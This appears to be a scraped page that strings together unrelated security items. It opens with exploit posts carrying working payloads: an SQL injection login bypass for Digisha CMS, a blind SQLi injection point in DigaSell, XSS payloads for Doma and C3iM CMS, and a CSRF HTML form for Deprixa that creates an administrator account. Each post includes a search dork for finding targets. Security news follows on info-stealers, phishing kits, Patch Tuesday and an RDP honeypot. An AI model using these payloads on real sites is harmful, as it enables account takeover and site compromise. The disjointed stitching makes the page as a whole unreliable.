Digisha CMS version 1.2.7 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Digisha CMS V1.2.7 Auth by pass Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             | | # Vendor    : http://www.digisha.com/                                                                                            |  | # Dork      : Powered by Digisha                                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user & pass = 1' or 1=1 -- -[+] http://127.0.0.1/ksminesindiacom/admin/welcome.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Digisha CMS 1.2.7 SQL Injection

DigaSell Digital Store PHP Script version 1.0.0 suffers from a remote blind SQL injection vulnerability.

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 Blind Sql Injection Vulnerability                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : http://127.0.0.1/codsemcom/digasell/search?term=1 <==== inject here                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/admin/dashboardGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

DigaSell Digital Store PHP Script 1.0.0 SQL Injection

Doma CMS version 1.0 suffers from a cross site scripting vulnerability.

    ==========================================================================================| # Title     : Doma CMS v1.0 xss Vulnerability                                          || # Author    : indoushka                                                                || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)  || # Vendor    : http://www.matstroeng.se/doma/                                           |  | # Dork      : Digital Orienteering Map Archive, version 1.0 | Log in                   |==========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : %22onmouseover%3d'prompt(1373)'bad%3d%22[+] http://127.0.0.1/doma/users.php/%22onmouseover%3d'prompt(903296)'bad%3d%22Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Doma CMS 1.0 Cross Site Scripting

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

Posted Aug 10, 2023

Authored by indoushka

Desenvolvido C3iM CMS version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | ee75f970e155669b73118332fbaa7e9c33f33900005bfc151805b9ba771cd102

Download | Favorite | View

**Desenvolvido C3iM CMS 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Desenvolvido C3iM CMS v2.0 XSS Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : http://c3im.pt/                                                                                                    |  | # Dork      : intext:''Desenvolvido C3iM'' site:pt                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : <marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/conteudo.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,928)
*   Arbitrary (16,193)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,275)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,848)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,768)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,670)
*   Local (14,447)
*   Magazine (586)
*   Overflow (12,690)
*   Perl (1,423)
*   PHP (5,144)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,759)
*   Root (3,580)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,364)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,767)
*   Web (9,662)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,930)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,810)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,423)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,805)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,572)
*   Other

Desenvolvido C3iM CMS 2.0 Cross Site Scripting

Deprixa version 3.2.5 suffers from a cross site request forgery vulnerability.

====================================================================================================================================  
| # Title     : Deprixa 3.2.5 CSRF Vulnerability                                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              |   
| # Vendor    : https://themes-dl.com/nulled-courier-deprixa-pro-integrated-web-system-v3-2-5-free-download/                       |    
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 11.

[+] Set the target site link Save changes and apply . 

[+] infected file : /dashboard/settings/addusersadmin/agregar.php.

   
          <div class="modal fade" id="nuevo" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">  
            <div class="modal-dialog">  
            <div class="modal-content">  
              <div class="modal-header">  
              <button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">&times;</span><span class="sr-only">Close</span></button>  
              <h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4>  
              </div>  
              <div class="modal-body">  
                
                <form action="https://127.0.0.1/deprixalogisticsonline/dashboard/settings/addusersadmin/agregar.php"  data-parsley-validate novalidate method="post" class="form-horizontal" enctype="multipart/form-data">  
                  <div class="form-group " id="gnombrepa">  
                  <label for="off_name" class="col-sm-2 control-label"></label>  
                  <div class="col-sm-10">  
                    <input type="text" class="form-control off_name" parsley-trigger="change" required name="name_parson"  placeholder="Administrator Name">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gapellido">  
                  <label for="email" class="col-sm-2 control-label">Email</label>  
                  <div class="col-sm-5">  
                    <input type="text" class="form-control email" name="email"  id="id_mail" placeholder="demo@demo.com" required onKeyUp="javascript:validateMail('id_mail')">  
                    <strong><span id="emailOK"></span></strong>  
                  <p class="error"></p>  
                  </div>  
                  <div class="col-sm-5">  
                    <input class="form-control phone" name="phone" parsley-trigger="change" required placeholder="Phone">                                        
                  </div>  
                  </div>  
                  <div class="form-group" id="gemail">  
                  <label for="office" class="col-sm-2 control-label">Office</label>  
                  <div class="col-sm-5">  
                    <input type="text" class="form-control office" parsley-trigger="change" required name="office"  placeholder="Name of the Office">  
                  </div>  
                  <div class="col-sm-5">  
                  <select type="text" class="form-control role" name="role" >  
                    <option value="Administrator">Administrator</option>                        
                  </select>  
                  </div>  
                  </div>  
                  <div class="form-group " id="gnombre">  
                  <label for="off_name" class="col-sm-2 control-label">User</label>  
                  <div class="col-sm-10">  
                    <input type="text" class="form-control off_name" parsley-trigger="change" required name="name"  placeholder="Username">  
                  </div>  
                  </div>  
                  <div class="form-group" id="gpassword">  
                  <label for="pwd" class="col-sm-2 control-label">Password</label>  
                  <div class="col-sm-10">  
                    <input type="text" class="form-control pwd" parsley-trigger="change" required name="pwd"  placeholder="Password">  
                  </div>  
                  </div>  
                  </br></br>  
                  <div class="col-sm-offset-2 col-sm-10">  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="estado" value="1" onclick="return false" checked >  
                      <i></i>  
                      State                      </label>  
                    </div>  
                    <div class="checkbox">  
                      <label class="i-checks i-checks-sm">  
                      <input type="checkbox" name="type" value="a" onclick="return false" checked >  
                      <i></i>  
                      User Type                      </label>  
                    </div>  
                  </div>

                                      
                </div>  
                 </br></br>  
                <div class="modal-footer">  
                  <button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>  
                    Close</button>  
                  <input class="btn btn-success" name="Submit" type="submit"  id="submit" value="Save">  
                </div>  
              </form>                                
            </div>  
            </div>  
          </div>

Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

Deprixa 3.2.5 Cross Site Request Forgery

A new information malware strain called Statc Stealer has been found infecting devices running Microsoft Windows to siphon sensitive personal and payment information.
"Statc Stealer exhibits a broad range of stealing capabilities, making it a significant threat," Zscaler ThreatLabz researchers Shivam Sharma and Amandeep Kumar said in a technical report published this week.
"It can steal

A new information malware strain called **Statc Stealer** has been found infecting devices running Microsoft Windows to siphon sensitive personal and payment information.

"Statc Stealer exhibits a broad range of stealing capabilities, making it a significant threat," Zscaler ThreatLabz researchers Shivam Sharma and Amandeep Kumar said in a technical report published this week.

"It can steal sensitive information from various web browsers, including login data, cookies, web data, and preferences. Additionally, it targets cryptocurrency wallets, credentials, passwords, and even data from messaging apps like Telegram."

Written in C++, the malicious stealer finds its way into victim systems when potential victims are tricked into clicking on seemingly innocuous ads, with the stealer imitating an MP4 video file format on web browsers like Google Chrome.

The first-stage payload, while dropping and executing a decoy PDF installer, also stealthily deploys a downloader binary that proceeds to retrieve the stealer malware from a remote server via a PowerShell script.

The stealer features sophisticated checks to inhibit sandbox detection and reverse engineering analysis, and establishes connections with a command-and-control (C&C) server to exfiltrate the harvested data using HTTPS.

One of the anti-analysis includes a comparison of the file names to inspect for any discrepancies and halt its execution, if found. Targeted web browsers include Google Chrome, Microsoft Edge, Mozilla Firefox, Brave, Opera, and Yandex Browser.

"The significance of Statc Stealer's exfiltration technique lies in its potential to steal sensitive browser data and send it securely to its C&C server," the researchers said. "This allows the malware to harvest valuable information, such as login credentials and personal details, for malicious purposes like identity theft and financial fraud."

The findings come as eSentire published an analysis of an updated version of Raccoon Stealer, which had its version 2.1 released earlier this February.

The authors of Raccoon Stealer temporarily halted work on the malware last year following the arrest of Mark Sokolovsky in March 2022, who was exposed as one of the leading developers after he made the fatal mistake of linking a Gmail account he used to sign up for a cybercrime forum under the alias Photix to an Apple iCloud account, thus revealing his real-world identity.

"The updated version includes features such as Signal Messenger data collection, cleaning from Defender detection (likely changing the code, obfuscation to avoid detections), and auto brute-forcing for crypto wallets," eSentire noted last week.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Statc Stealer Malware Emerges: Your Sensitive Data at Risk

The EmbedPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'embedpress_calendar' shortcode in versions up to, and including, 3.8.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVE-2023-4283: Changeset 2950211 for embedpress – WordPress Plugin Repository

Threat actors are increasingly using a phishing-as-a-service (PhaaS) toolkit dubbed EvilProxy to pull off account takeover attacks aimed at high-ranking executives at prominent companies.
According to Proofpoint, an ongoing hybrid campaign has leveraged the service to target thousands of Microsoft 365 user accounts, sending approximately 120,000 phishing emails to hundreds of organizations

Threat actors are increasingly using a phishing-as-a-service (PhaaS) toolkit dubbed EvilProxy to pull off account takeover attacks aimed at high-ranking executives at prominent companies.

According to Proofpoint, an ongoing hybrid campaign has leveraged the service to target thousands of Microsoft 365 user accounts, sending approximately 120,000 phishing emails to hundreds of organizations worldwide between March and June 2023.

Nearly 39% of the hundreds of compromised users are said to be C-level executives, including CEOs (9%) and CFOs (17%). The attacks have also singled out personnel with access to financial assets or sensitive information. At least 35% of all compromised users had additional account protections enabled.

The campaigns are seen as a response to the increased adoption of multi-factor authentication (MFA) in enterprises, prompting threat actors to evolve their tactics to bypass new security layers by incorporating adversary-in-the-middle (AitM) phishing kits to siphon credentials, session cookies, and one-time passwords.

"Attackers use new advanced automation to accurately determine in real-time whether a phished user is a high-level profile, and immediately obtain access to the account, while ignoring less lucrative phished profiles," the enterprise security firm said.

EvilProxy was first documented by Resecurity in September 2022, detailing its ability to compromise user accounts associated with Apple iCloud, Facebook, GoDaddy, GitHub, Google, Dropbox, Instagram, Microsoft, NPM, PyPI, RubyGems, Twitter, Yahoo, and Yandex, among others.

It's sold as a subscription for $400 a month, a figure that can climb up to $600 for Google accounts.

PhaaS toolkits are an evolution of the cybercrime economy, lowering the barrier for criminals with lower technical skills to carry out sophisticated phishing attacks at scale in a seamless and cost-effective manner.

"Nowadays, all an attacker needs is to set up a campaign using a point-and-click interface with customizable options, such as bot detection, proxy detection, and geofencing," security researchers Shachar Gritzman, Moshe Avraham, Tim Kromphardt, Jake Gionet, and Eilon Bendet said.

"This relatively simple and low-cost interface has opened a floodgate of successful MFA phishing activity."

The latest wave of attacks commences with phishing emails that masquerade as trusted services like Adobe and DocuSign to trick recipients into clicking on malicious URLs that activate a multi-stage redirection chain to take them to a lookalike Microsoft 365 login page, which functions as a reverse proxy to stealthily capture the information entered in the form.

But in a curious twist, the attacks deliberately skip user traffic originating from Turkish IP addresses by redirecting them to legitimate websites, indicating that the campaign operators could be based out of the country.

A successful account takeover is followed by the threat actor taking steps to "cement their foothold" in the organization's cloud environment by adding their own MFA method, such as a two-factor authenticator app, so as to obtain persistent remote access and conduct lateral movement and malware proliferation.

The access is further monetized to either conduct financial fraud, exfiltrate confidential data, or sell the compromised user accounts to other attackers.

"Reverse proxy threats (and EvilProxy in particular) are a potent threat in today's dynamic landscape and are outcompeting the less capable phish kits of the past," the researchers said, pointing out that "not even MFA is a silver bullet against sophisticated cloud-based threats."

"Although these attacks' initial threat vector is email-based, their final goal is to compromise and exploit valuable cloud user accounts, assets, and data."

The development comes as Imperva revealed details of an ongoing Russian-origin phishing campaign that aims to deceive potential targets and steal their credit card and bank information since at least May 2022 via booby-trapped links shared via WhatsApp messages.

The activity spans 800 different scam domains, impersonating more than 340 companies across 48 languages. This comprises well-known banks, postal services, package delivery services, social media, and e-commerce sites.

"By leveraging a high-quality, single-page application, the scammers were able to dynamically create a convincing website that impersonated a legitimate site, fooling users into a false sense of security," Imperva said.

In yet another variation of a social engineering attack identified by eSentire, malicious actors have been observed contacting marketing professionals on LinkedIn in an attempt to distribute a .NET-based loader malware codenamed HawkEyes that, in turn, is used to launch Ducktail, an information stealer with a particular focus on gathering Facebook Business account information.

"Ducktail is known to target Facebook Ad and Business accounts," eSentire researchers said. "Operators will use stolen login data to add email addresses to Facebook Business accounts. When emails are added, a registration link is generated by which the threat actor can grant themselves access."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Cybercriminals Increasingly Using EvilProxy Phishing Kit to Target Executives

Categories: Exploits and vulnerabilities
Categories: News
Microsoft has announced patches for 87 vulnerabilities this month, including two that are being actively exploited.



(Read more...)




The post August Patch Tuesday stops actively exploited attack chain and more appeared first on Malwarebytes Labs.

August’s Patch Tuesday is a lot quieter than it was last month, when Microsoft patched a whopping 130 vulnerabilities. That number went down to 87 this month but it does include two actively exploited vulnerabilities.

Let’s start by looking at those two:

CVE-2023-38180 (CVSS score 7.5 out of 10): a .NET and Visual Studio Denial of Service (DoS) vulnerability. Although there is a Proof of Concept (PoC) available to exploit this vulnerability, Microsoft notes that the code or technique is not functional in all situations and may require substantial modification by a skilled attacker, probably because the attacker would need to be on the same network as the target system.

CVE-2023-36884 (CVSS score 7.5 out of 10): a Windows Search Remote Code Execution (RCE) vulnerability. We discussed it last month in detail when Microsoft offered mitigation advice. The CVSS score and scope of the vulnerability have been changed since then. Microsoft has issued a security advisory about this and recommends installing the Office updates it discusses, as well as installing the Windows updates from August 2023..

Other vulnerabilities that deserve some attention are six vulnerabilities in Microsoft Exchange Server including:

CVE-2023-21709 (CVSS score 9.8 out of 10): a Microsoft Exchange Server Elevation of Privilege (EoP) vulnerability which could allow an attacker to login as another user. In the FAQ about the vulnerability Microsoft says that additional steps are needed to protect against this vulnerability.

In addition to installing the updates a script must be run. Alternatively you can accomplish the same by running commands from the command line in a PowerShell window or some other terminal.

**Follow these steps:**

(Strongly recommended) Install Exchange Server 2016 or 2019 August SU (or later)

Do one of the following:

Apply the solution for the CVE automatically on your servers, run the CVE-2023-21709.ps1 script. You can find the script and the documentation here: https://aka.ms/CVE-2023-21709ScriptDoc.

or

Apply the solution for the CVE manually on each server, by running the following command from an elevated PowerShell window:

Clear-WebConfiguration -Filter "/system.webServer/globalModules/add\[@name='TokenCacheModule'\]" -PSPath "IIS:\\"

To roll-back the solution for the CVE manually on each server, run the following:

New-WebGlobalModule -Name "TokenCacheModule" -Image "%windir%\\System32\\inetsrv\\cachtokn.dll"

Although Microsoft recommends installing the security updates as soon as possible, running the script or the commands on a supported version of Exchange Server prior to installing the updates will address this vulnerability.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones that you may find in your environment.

**Adobe** has issued a critical security update for Acrobat and Reader.

**Android’s** August updates were released by Google.

**Cisco** released security updates for Cisco Secure Web Appliance and Cisco AnyConnect.

**Fortinet** has released a security update to address a vulnerability (CVE-2023-29182).

**Ivanti** has patched a second zero-day vulnerability (CVE-2023-35081).

**SAP** has released its August 2023 Patch Day updates.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

August Patch Tuesday stops actively exploited attack chain and more

Security researchers set up a remote machine and recorded every move cybercriminals made—including their login details.

Plenty of people tried to access the system. Over the past three years, it has captured 21 million login attempts, with more than 2,600 successful logins by attackers brute-forcing the weak password they purposefully used on the system. They recorded 2,300 of these successful logins, gathered 470 files that were uploaded, and analyzed 339 of the videos with useful footage. (Some recordings were just a couple of seconds long, and proved less useful.) “We cataloged the techniques, the tooling, everything done on these systems,” Bilodeau says.

Bergeron and Bilodeau have grouped the attackers into five broad categories based on character types from the role-playing game Dungeons and Dragons. Most common were the rangers: once these attackers were inside the trap RDP session, they would immediately start exploring the system, removing Windows antivirus tools, delving into folders, looking at the network it was on and other elements of the machine. Rangers wouldn’t take any action, Bergeron says. “It's basic recon,” she says, suggesting they may be evaluating the system for others to enter it.

Barbarians were the next most frequent kind of attackers. These use multiple hacking tools, such as Masscan and NLBrute, to brute-force their way into other computers, the researchers say. They work through a list of IP addresses, usernames, and passwords, trying to break into the machines. Similarly, the group they call wizards use their access to the RDP to launch attacks against other insecure RDPs—potentially masking their identity across many layers. “They use the RDP access as a portal to connect to other computers,” Bergeron says.

The thieves, meanwhile, do what their name implies. They try to make money out of the RDP access in any way possible. They use traffic monetization websites and install crypto miners, the researchers say. They might not earn a lot in one go, but multiple compromises can add up.

The final group Bergeron and Bilodeau observed is the most haphazard: the bards. These people, the researchers say, may have purchased access to the RDP and are using it for a variety of reasons. One person the researchers watched Googled the “strongest virus ever,” Bergeron says, while another tried to access Google Ads.

Others simply tried (and failed) to find porn. “We can see the beginner level he is in, as he searched for porn on YouTube—nothing appears, of course,” Bergeron says, since YouTube doesn’t permit pornography. Multiple sessions were spotted trying to access porn, the researchers say, and these users were always writing in Farsi, indicating they may be trying to access porn in places where it is blocked. (The researchers weren’t able to determine conclusively where many of those accessing the RDP were doing so from.)

Despite this, watching the attackers reveals the way they behave, including some more peculiar actions. Bergeron, who has a PhD in criminology, says the attackers were sometimes “very slow” at doing their work. Often she was “getting impatient” while watching them, she says. “I’m like: ‘Come on, you're not good at that’ or 'Go faster’ or ‘Go deeper,’ or ‘You can do better.’”

Tag

#google